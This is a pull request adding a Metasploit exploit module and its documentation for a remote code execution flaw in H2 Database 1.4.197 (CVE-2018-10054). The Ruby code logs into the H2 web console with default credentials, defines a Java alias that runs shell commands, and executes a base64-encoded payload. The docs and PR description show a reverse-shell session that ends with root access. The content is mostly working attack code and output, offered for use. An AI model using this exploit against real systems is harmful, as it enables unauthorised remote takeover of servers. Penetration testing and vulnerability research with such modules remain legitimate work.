### PR TITLE
H2 Database Code Execution

### DIFF
--- a/documentation/modules/exploit/multi/http/h2_alias.md
+++ b/documentation/modules/exploit/multi/http/h2_alias.md
@@ -1,0 +1,35 @@
+## Vulnerable Application
+
+This module exploits an arbitrary code execution vulnerability in H2 Database version 1.4.197 using the ALIAS functionality. The H2 Database is used in Datomic before 0.9.5697 and other products and a copy of the vulnerable application can be downloaded from [https://www.exploit-db.com](https://www.exploit-db.com/apps/af9c1b47ddd7f3c58aaf189e25f3b714-h2-2017-06-10.zip).
+
+## Verification Steps
+
+Example steps in this format:
+
+1. Install the application
+1. Start msfconsole
+1. Do: ```use exploit/multi/http/h2_alias```
+1. Do: ```set RHOST [target host]```
+1. Do: ```exploit```
+1. You should get a shell.
+
+## Scenarios
+
+Example usage against a Linux x64 bit target running H2 Database 1.4.197.
+
+```
+msf > use exploit/multi/http/h2_alias
+msf exploit(multi/http/h2_alias) > set RHOST 192.168.216.23
+RHOST => 192.168.216.23
+msf exploit(multi/http/h2_alias) > set PAYLOAD cmd/unix/reverse_ruby
+PAYLOAD => cmd/unix/reverse_ruby
+msf exploit(multi/http/h2_alias) > set LHOST 192.168.216.25 
+LHOST => 192.168.216.25
+msf exploit(multi/http/h2_alias) > exploit 
+
+[*] Started reverse TCP handler on 192.168.216.25:4444 
+[*] Command shell session 1 opened (192.168.216.25:4444 -> 192.168.216.23:45390) at 2018-07-31 14:38:21 -0400
+id
+
+uid=(root) gid=0(root) groups=0(root)
+```

--- a/modules/exploits/multi/http/h2_alias.rb
+++ b/modules/exploits/multi/http/h2_alias.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'H2 Arbitrary Code Execution using CREATE ALIAS',
+      'Description'    => %q{
+        'H2 1.4.197, as used in Datomic before 0.9.5697 and other products, allows
+         remote code execution because CREATE ALIAS can execute arbitrary Java code.'
+      },
+      'Author'         => [
+        'gambler',         # Proof of concept
+        'Daniel Teixeira', # Metasploit module
+        'epinna',          # Metasploit module
+      ],
+      'References'     => [
+        ['EDB', '44422'],
+        ['CVE', '2018-10054']
+      ],
+      'DisclosureDate' => 'Apr 9 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['H2', {}]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      Opt::RPORT(8082),
+      OptString.new('JDBC_URL', [true, 'URL to the H2 Database', 'jdbc:h2:~/test']),
+      OptString.new('USERNAME', [true, 'H2 Database Username', 'sa']),
+      OptString.new('PASSWORD', [false, 'H2 Database Password', nil])
+    ])
+  end
+
+  def exploit
+    base64_payload = Rex::Text.encode_base64("#{payload.encoded}")
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['URI']),
+      'method' => 'GET'
+    })
+
+    resp=res.body.scan(/jsessionid=(\w+)/).flatten.first
+
+    uri = normalize_uri(target_uri.path, "login.do?jsessionid=#{resp}")
+
+    res = send_request_cgi({
+      'method'     => 'POST',
+      'uri'        => uri,
+      'vars_post'  => {
+        'language' => 'en',
+        'setting'  => 'Generic+H2+(Embedded)',
+        'name'     => 'Generic+H2+(Embedded)',
+        'driver'   => 'org.h2.Driver',
+        'url'      => datastore['JDBC_URL'],
+        'user'     => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+       }
+    })
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, "/query.do?jsessionid=#{resp}"),
+      'vars_post' => {
+        'sql'     => "CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\"); return s.hasNext() ? s.next() : \"\";  }$$; CALL SHELLEXEC(\'bash -c {eval,$({base64,--decode}<<<#{base64_payload})}&\')"
+      }
+    })
+  end
+end


### PR DESCRIPTION
This PR adds a module to exploit a code execution vulnerability in H2 Database version 1.4.197 using the ALIAS functionality.

Tested on: Linux x64 bit target running H2 Database 1.4.197. 

## Verification

List the steps needed to make sure this thing works

- [ ] Install the application
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/h2_alias`
- [ ] set RHOST
- [ ] Exploit
- [ ] Get a session

## Example

```
msf > use exploit/multi/http/h2_alias
msf exploit(multi/http/h2_alias) > set RHOST 192.168.216.23
RHOST => 192.168.216.23
msf exploit(multi/http/h2_alias) > set PAYLOAD cmd/unix/reverse_ruby
PAYLOAD => cmd/unix/reverse_ruby
msf exploit(multi/http/h2_alias) > set LHOST 192.168.216.25 
LHOST => 192.168.216.25
msf exploit(multi/http/h2_alias) > exploit 

[*] Started reverse TCP handler on 192.168.216.25:4444 
[*] Command shell session 1 opened (192.168.216.25:4444 -> 192.168.216.23:45390) at 2018-07-31 14:38:21 -0400
id

uid=(root) gid=0(root) groups=0(root)
```